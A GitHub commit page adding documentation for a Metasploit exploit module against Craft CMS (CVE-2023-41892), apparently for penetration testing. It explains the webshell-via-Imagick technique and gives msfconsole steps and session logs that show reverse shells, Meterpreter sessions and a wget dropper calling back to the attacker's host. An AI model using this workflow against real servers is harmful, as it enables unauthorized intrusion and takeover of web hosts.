Skip to content

Commit

Permalink
Land #18612, Craft CMS unauthenticed RCE [CVE-2023-41892]
Browse files Browse the repository at this point in the history
  • Loading branch information
@cdelafuente-r7
cdelafuente-r7 committed Dec 22, 2023
2 parents d461187 + 4c40476 commit 3182cb4
Show file tree
Hide file tree
Showing 2 changed files with 499 additions and 0 deletions.
231 changes: 231 additions & 0 deletions documentation/modules/exploit/linux/http/craftcms_unauth_rce_cve_2023_41892.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,231 @@
## Vulnerable Application
This module exploits Remote Code Execution vulnerability (CVE-2023-41892) in CraftCMS which is a popular content management system.
CraftCMS versions between `4.0.0-RC1` - `4.4.14` are affected by this vulnerability allowing attackers to execute arbitrary code remotely,
potentially compromising the security and integrity of the application.

The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class which allows to run arbitrary
PHP code by escalating the object creation calling some methods available in `\GuzzleHttp\Psr7\FnStream`.
Using this vulnerability in combination with `The Imagick Extension` and `MSL` which stands for `Magick Scripting Language`,
a full RCE can be achieved. `MSL` is a built-in `ImageMagick` language that facilitates the reading of images, performance of
image processing tasks, and writing of results back to the filesystem. This can be leveraged to create a dummy image containing malicious
PHP code using the `Imagick` constructor class delivering a webshell that can be accessed by the attacker, thereby executing the malicious
PHP code and gaining access to the system.
Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain access to the underlying operating
system as the user that the web services are running as (typically `www-data`).

## Installation
To test this module, you will need a vulnerable CraftCMS application.

This module has been tested on:
- [ ] `CraftCMS 4.4.14` running on MacOS Docker Desktop based on a `DDEV` deployment.

### Installation steps to install CraftCMS on MacOS using Desktop Docker and DDEV
* Install [Docker Desktop](https://ddev.readthedocs.io/en/stable/users/install/docker-installation/#macos) on your MacOS distribution.
* Install [DDEV](https://ddev.readthedocs.io/en/stable/users/install/ddev-installation/).
* Install CraftCMS following these [installation steps](https://craftcms.com/docs/getting-started-tutorial/install/).
* NOTE: After step 2 `Scaffold the project from the official starter project`, open composer.json to edit the CraftCMS version and
* set it to `4.4.14` or lower.
* Run `composer update` to downgrade the `CraftCMS` version to a vulnerable version.
* See also these [instructions](https://craftcms.com/knowledge-base/downloading-previous-craft-versions).

* Continue with step 3 and after completion, you should be able to access your application using your site name (https://mysite.ddev.site)
* To access your application from another host, you need to setup a tunnel otherwise you can only access it from the local machine.
* You can follow these [instructions](https://stackoverflow.com/questions/53371087/access-ddev-web-container-from-other-hosts).

You are now ready to test the module.

## Verification Steps
- [x] Start `msfconsole`
- [x] `use exploit/linux/http/craftcms_unauth_rce_cve_2023_41892`
- [x] `set rhosts <ip-target>`
- [x] `set rport 443`
- [x] `set lhost <ip-attacker>`
- [x] `set target <0=php, 1=Unix Command, 2=Linux Dropper>`
- [x] `exploit`

you should get a `shell` or `Meterpreter`


```shell
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > info

Name: Craft CMS unauthenticated Remote Code Execution (RCE)
Module: exploit/linux/http/craftcms_unauth_rce_cve_2023_41892
Platform: Unix, Linux, PHP
Arch: cmd, php, x64, x86
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2023-09-13

Provided by:
chybeta
h00die-gr3y <[email protected]>

Module side effects:
artifacts-on-disk
ioc-in-logs

Module stability:
crash-safe

Module reliability:
repeatable-session

Available targets:
Id Name
-- ----
=> 0 PHP
1 Unix Command
2 Linux Dropper

Check supported:
Yes

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.ht
ml
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Craft CMS base url
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
WEBSHELL no The name of the webshell with extension .php. Webshell name will be randomly generated if left unset
.


When TARGET is not 0:

Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND passthru yes Use PHP command function (Accepted: passthru, shell_exec, system, exec)


When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.
0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.

Payload information:

Description:
This module exploits Remote Code Execution vulnerability (CVE-2023-41892) in Craft CMS which is a popular
content management system. Craft CMS versions between 4.0.0-RC1 - 4.4.14 are affected by this vulnerability
allowing attackers to execute arbitrary code remotely, potentially compromising the security and integrity
of the application.

The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class
which allows to run arbitary PHP code by escalating the object creation calling some methods available in
`\GuzzleHttp\Psr7\FnStream`. Using this vulnerability in combination with The Imagick Extension and MSL which
stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that
facilitates the reading of images, performance of image processing tasks, and writing of results back
to the filesystem. This can be leveraged to create a dummy image containing mailcious PHP code using the
Imagick constructor class delivering a webshell that can be accessed by the attacker, thereby executing the
malicious PHP code and gaining access to the system.

Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain
access to the underlying operating system as the user that the web services are running as (typically www-data).

References:
https://nvd.nist.gov/vuln/detail/CVE-2023-41892
https://blog.calif.io/p/craftcms-rce
https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/
https://github.com/advisories/GHSA-4w8r-3xrw-v25g
https://attackerkb.com/topics/2u7OaYlv1M/cve-2023-41892


View the full module info with the info -d command.
```
## Options
### WEBSHELL
You can use this option to set the filename of the webshell with extension `.php`, otherwise the name will be randomly generated.
### COMMAND
This option provides the user to choose the PHP underlying shell command function to be used for execution.
The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`.
This option is only available when the target selected is either Unix Command or Linux Dropper.
For the native PHP target, by default the `eval()` function will be used for native PHP code execution.
## Scenarios
### CraftCMS 4.4.14 on MacOS PHP - php/meterpreter/reverse_tcp
```shell
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.25
[+] Deleted /var/www/html/web/CDfbvAnrZMH.php
[+] Deleted /tmp/php5M63PK
[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.25:51044) at 2023-12-17 12:31:55 +0000

meterpreter > sysinfo
Computer : craftcms-vuln-web
OS : Linux craftcms-vuln-web 6.4.16-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Nov 16 10:55:59 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data
meterpreter >
```
### CraftCMS 4.4.14 on MacOS Unix Command - cmd/unix/reverse_bash
```shell
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > set target 1
target => 1
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted /var/www/html/web/XGCuZFdoia.php
[+] Deleted /tmp/phpakTlmu
[*] Command shell session 2 opened (192.168.201.8:4444 -> 192.168.201.25:51101) at 2023-12-17 12:34:34 +0000

uname -a
Linux craftcms-vuln-web 6.4.16-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Nov 16 10:55:59 UTC 2023 x86_64 GNU/Linux
id
uid=501(www-data) gid=20(dialout) groups=20(dialout)```
### CraftCMS 4.4.14 on MacOS Linux Dropper - linux/x64/meterpreter/reverse_tcp
```shell
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > set target 2
target => 2
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.8:8080/bzzA52uoIqWP
[*] Client 192.168.201.25 (Wget/1.21) requested /bzzA52uoIqWP
[*] Sending payload to 192.168.201.25 (Wget/1.21)
[*] Sending stage (3045380 bytes) to 192.168.201.25
[+] Deleted /var/www/html/web/sFQEhvKKcl.php
[+] Deleted /tmp/phpeQPKpy
[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.25:51122) at 2023-12-17 12:35:54 +0000
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer : 192.168.16.2
OS : Debian 11.8 (Linux 6.4.16-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter >
```
## Limitations
Part of the exploit is the MSL script creation triggered by the Imagick plugin module. These files are created in the directory
set by the `upload_tmp_dir` setting in the `php.ini` file (default `/tmp`). These files are automatically cleaned, but in case of
any failure cleaning these files, do clean them manually otherwise the next exploit session will fail using an outdated MSL file.
These files start with `php` and you can list them with the command `ls php*`.
Loading

0 comments on commit 3182cb4

Please sign in to comment.